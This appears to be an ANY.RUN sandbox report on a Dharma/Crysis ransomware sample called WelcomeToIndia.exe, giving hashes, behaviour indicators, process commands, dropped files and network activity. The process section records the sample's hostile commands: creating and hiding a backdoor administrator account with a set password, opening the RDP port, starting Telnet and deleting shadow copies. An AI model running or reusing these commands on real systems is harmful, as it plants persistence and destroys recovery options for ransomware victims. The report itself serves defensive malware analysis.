File name:

WelcomeToIndia.exe

Full analysis: https://app.any.run/tasks/072f67e2-32b9-4809-82d3-438895232522
Verdict: Malicious activity
Threats:

Dharma is advanced ransomware that has been observed in the wild since 2016. It is considered to be the second most profitable RaaS operation by the FBI. The malware targets hospitals and state organizations, encrypts files, and demands a payment to restore access to lost information.

Analysis date: October 20, 2023, 23:58:05
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ransomware
dharma
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows
MD5:

928E37519022745490D1AF1CE6F336F7

SHA1:

B7840242393013F2C4C136AC7407E332BE075702

SHA256:

6FB303DD8BA36381948127D44BD8541E4A1AB8AF07B46526ACE08458F2498850

SSDEEP:

196608:JZnMy97vfgla5NX7YaP6uIEJsp+jb4agYSUpHm6g90MrYmhZZoG0tLzr1+W:LnMy9rfma5NrYaVzC0b4vpZZoG0tR+W

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Drops the executable file immediately after the start

      • WelcomeToIndia.exe (PID: 2460)
      • mssql2.exe (PID: 3520)
    • Application was dropped or rewritten from another process

      • nc123.exe (PID: 4000)
      • WelcomeToIndia.exe (PID: 2460)
      • SearchHost.exe (PID: 4036)
      • mssql2.exe (PID: 3520)
      • mssql2.exe (PID: 2756)
      • SearchHost.exe (PID: 2568)
    • Dharma/Crysis is detected

      • WelcomeToIndia.exe (PID: 2460)
    • Starts NET.EXE to view/add/change user profiles

      • net.exe (PID: 1248)
      • cmd.exe (PID: 3564)
    • Starts NET.EXE to view/change users localgroup

      • net.exe (PID: 2232)
      • net.exe (PID: 3184)
      • cmd.exe (PID: 3564)
    • Starts NET.EXE to view/change login properties

      • cmd.exe (PID: 3564)
      • net.exe (PID: 3480)
    • Deletes shadow copies

      • cmd.exe (PID: 3428)
    • Starts NET.EXE for service management

      • net.exe (PID: 3068)
      • cmd.exe (PID: 3564)
    • Connects to the CnC server

      • mssql2.exe (PID: 3520)
    • Actions looks like stealing of personal data

      • SearchHost.exe (PID: 2568)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • nc123.exe (PID: 4000)
      • WelcomeToIndia.exe (PID: 2460)
      • cmd.exe (PID: 3564)
    • Executing commands from a ".bat" file

      • WelcomeToIndia.exe (PID: 2460)
    • The process creates files with name similar to system file names

      • WelcomeToIndia.exe (PID: 2460)
    • Reads the Internet Settings

      • WelcomeToIndia.exe (PID: 2460)
      • SearchHost.exe (PID: 4036)
      • WMIC.exe (PID: 1920)
      • WMIC.exe (PID: 3728)
      • mssql2.exe (PID: 3520)
    • Drops a system driver (possible attempt to evade defenses)

      • mssql2.exe (PID: 3520)
    • Uses WMIC.EXE to obtain group account data

      • cmd.exe (PID: 2876)
      • cmd.exe (PID: 2264)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 3564)
    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 3564)
    • Uses NETSH.EXE to add a firewall rule or allowed programs

      • cmd.exe (PID: 3564)
    • Application launched itself

      • cmd.exe (PID: 3564)
      • SearchHost.exe (PID: 4036)
    • Starts SC.EXE for service management

      • cmd.exe (PID: 3564)
  • INFO

    • Reads the computer name

      • WelcomeToIndia.exe (PID: 2460)
      • nc123.exe (PID: 4000)
      • mssql2.exe (PID: 3520)
      • SearchHost.exe (PID: 4036)
      • SearchHost.exe (PID: 2568)
    • Checks supported languages

      • WelcomeToIndia.exe (PID: 2460)
      • nc123.exe (PID: 4000)
      • mssql2.exe (PID: 3520)
      • SearchHost.exe (PID: 4036)
      • SearchHost.exe (PID: 2568)
    • Reads the machine GUID from the registry

      • mssql2.exe (PID: 3520)
      • SearchHost.exe (PID: 2568)
    • Creates files or folders in the user directory

      • mssql2.exe (PID: 3520)
    • Checks proxy server information

      • mssql2.exe (PID: 3520)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (64.6)
.dll | Win32 Dynamic Link Library (generic) (15.4)
.exe | Win32 Executable (generic) (10.5)
.exe | Generic Win/DOS Executable (4.6)
.exe | DOS Executable Generic (4.6)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2020:06:25 12:38:29+02:00
ImageFileCharacteristics: Executable, 32-bit
PEType: PE32
LinkerVersion: 14
CodeSize: 155648
InitializedDataSize: 112640
UninitializedDataSize: -
EntryPoint: 0x13c60
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
80
Monitored processes
32
Malicious processes
8
Suspicious processes
0

Behavior graph

Click at the process to see the details
drop and start drop and start start #DHARMA welcometoindia.exe no specs nc123.exe no specs cmd.exe no specs mssql2.exe no specs mssql2.exe cmd.exe no specs cmd.exe no specs searchhost.exe no specs vssadmin.exe no specs cmd.exe no specs wmic.exe no specs find.exe no specs net.exe no specs net1.exe no specs net.exe no specs net1.exe no specs cmd.exe no specs wmic.exe no specs find.exe no specs net.exe no specs net1.exe no specs net1.exe no specs net.exe no specs reg.exe no specs reg.exe no specs reg.exe no specs attrib.exe no specs netsh.exe no specs sc.exe no specs net1.exe no specs net.exe no specs searchhost.exe

Process information

PID
CMD
Path
Indicators
Parent process
604netsh firewall add portopening TCP 3389 "Remote Desktop"C:\Windows\System32\netsh.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Network Command Shell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\netsh.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\credui.dll
c:\windows\system32\user32.dll
668C:\Windows\system32\net1 localgroup Administrators systembackup /addC:\Windows\System32\net1.exenet.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Net Command
Exit code:
2
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\net1.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\dsrole.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\netutils.dll
1176C:\Windows\system32\cmd.exe /c clsC:\Windows\System32\cmd.exenc123.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1248net user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"C:\Windows\System32\net.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Net Command
Exit code:
2
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\net.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\netutils.dll
c:\windows\system32\browcli.dll
1832Find "="C:\Windows\System32\find.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Find String (grep) Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\find.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ulib.dll
c:\windows\system32\user32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
1868reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systembackup /t REG_DWORD /d 0x0 /fC:\Windows\System32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\user32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
1920WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value C:\Windows\System32\wbem\WMIC.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
WMI Commandline Utility
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
2016vssadmin delete shadows /allC:\Windows\System32\vssadmin.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Command Line Interface for Microsoft® Volume Shadow Copy Service
Exit code:
2
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\vssadmin.exe
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\sechost.dll
c:\windows\system32\gdi32.dll
2128C:\Windows\system32\net1 start TelnetC:\Windows\System32\net1.exenet.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Net Command
Exit code:
2
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\net1.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\dsrole.dll
c:\windows\system32\netutils.dll
2232net localgroup Administrators systembackup /addC:\Windows\System32\net.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Net Command
Exit code:
2
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\net.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\netutils.dll
c:\windows\system32\samcli.dll
Total events
6 016
Read events
5 932
Write events
82
Delete events
2

Modification events

(PID) Process:(2460) WelcomeToIndia.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2460) WelcomeToIndia.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2460) WelcomeToIndia.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2460) WelcomeToIndia.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(4036) SearchHost.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(4036) SearchHost.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(4036) SearchHost.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(4036) SearchHost.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(3520) mssql2.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\mssql2aq\Enum
Operation:delete keyName:(default)
Value:
(PID) Process:(3520) mssql2.exeKey:HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\mssql2aq
Operation:delete keyName:(default)
Value:
Executable files
7
Suspicious files
0
Text files
10
Unknown types
0

Dropped files

PID
Process
Filename
Type
2460WelcomeToIndia.exeC:\Users\admin\Desktop\ac\systembackup.battext
MD5:B4B2F1A6C7A905781BE7D877487FC665
SHA256:6246B0045CA11DA483E38317421317DC22462A8D81E500DEE909A5269C086B5F
3520mssql2.exeC:\Users\admin\Desktop\ac\mssql2aq.sysexecutable
MD5:E84B6ADEDD6BE5760324A52FAF73E716
SHA256:49030B013A39FA3C0BF266CBC2384B56AF83C62614EBC5E89122DA992E865457
2460WelcomeToIndia.exeC:\Users\admin\Desktop\ac\unlocker.exeexecutable
MD5:5840AA36B70B7C03C25E5E1266C5835B
SHA256:09D7FCBF95E66B242FF5D7BC76E4D2C912462C8C344CB2B90070A38D27AAEF53
2460WelcomeToIndia.exeC:\Users\admin\Desktop\ac\EVER\1saas\LogDelete.exeexecutable
MD5:6CA170ECE252721ED6CC3CFA3302D6F0
SHA256:F3A23E5E9A7CAEFCC81CFE4ED8DF93FF84D5D32C6C63CDBB09F41D84F56A4126
2460WelcomeToIndia.exeC:\Users\admin\Desktop\ac\Shadow.battext
MD5:DF8394082A4E5B362BDCB17390F6676D
SHA256:DA3F155CFB98CE0ADD29A31162D23DA7596DA44BA2391389517FE1A2790DA878
2568SearchHost.exeC:\Users\admin\Desktop\ac\EVER\Run History.csvtext
MD5:39CAD7D0DCDE0D0805BE963EAC40935B
SHA256:DC95A9E86B734A1EB253B54ED3659E0FE464B8D866F4B47D58D8A93783E8047D
3520mssql2.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\KIBEVABG.txttext
MD5:08E22CCEC8DD85B8C69D2F86A81F09F7
SHA256:63ACC55F8F816BC90794EE2608E15F60913C8211FF4D4599C357A706953C7130
2568SearchHost.exeC:\Users\admin\Desktop\ac\EVER\Everything.ini.tmptext
MD5:893F4E8E95B931620A30FC6366319336
SHA256:9A5961E6D68A923ECBFEFAA3B370F6FD375BACC9C42CEF8EC8AEC8F7EFB35DFD
2568SearchHost.exeC:\Users\admin\Desktop\ac\EVER\Everything.initext
MD5:893F4E8E95B931620A30FC6366319336
SHA256:9A5961E6D68A923ECBFEFAA3B370F6FD375BACC9C42CEF8EC8AEC8F7EFB35DFD
2460WelcomeToIndia.exeC:\Users\admin\Desktop\ac\EVER\Everything.initext
MD5:5531BBB8BE242DFC9950F2C2C8AA0058
SHA256:4F03AB645FE48BF3783EB58568E89B3B3401956DD17CB8049444058DAB0634D7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
6
DNS requests
2
Threats
1

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3520
mssql2.exe
GET
302
185.107.56.52:80
http://www.epoolsoft.com/PCHunter_StandardV1.54=0604FD838CB416A17DC2548DD3AD6A66BED5FBD216E6F6E9F174187CF61C0B6895E9303F8C6E83B919D9D97610EBFDAA
unknown
text
11 b
unknown
3520
mssql2.exe
GET
64.190.63.136:80
http://ww1.epoolsoft.com/?sub1=a2f1e446-6fa4-11ee-ba55-a1e6868f9045
unknown
unknown
3520
mssql2.exe
GET
200
185.107.56.52:80
http://www.epoolsoft.com/pchunter/pchunter_free
unknown
html
500 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
2656
svchost.exe
239.255.255.250:1900
whitelisted
4
System
192.168.100.255:138
whitelisted
3520
mssql2.exe
185.107.56.52:80
www.epoolsoft.com
NForce Entertainment B.V.
NL
unknown
3520
mssql2.exe
64.190.63.136:80
ww1.epoolsoft.com
SEDO GmbH
DE
unknown

DNS requests

Domain
IP
Reputation
www.epoolsoft.com
  • 185.107.56.52
unknown
ww1.epoolsoft.com
  • 64.190.63.136
unknown

Threats

PID
Process
Class
Message
3520
mssql2.exe
Misc activity
ET POLICY PCHunter CnC activity
No debug info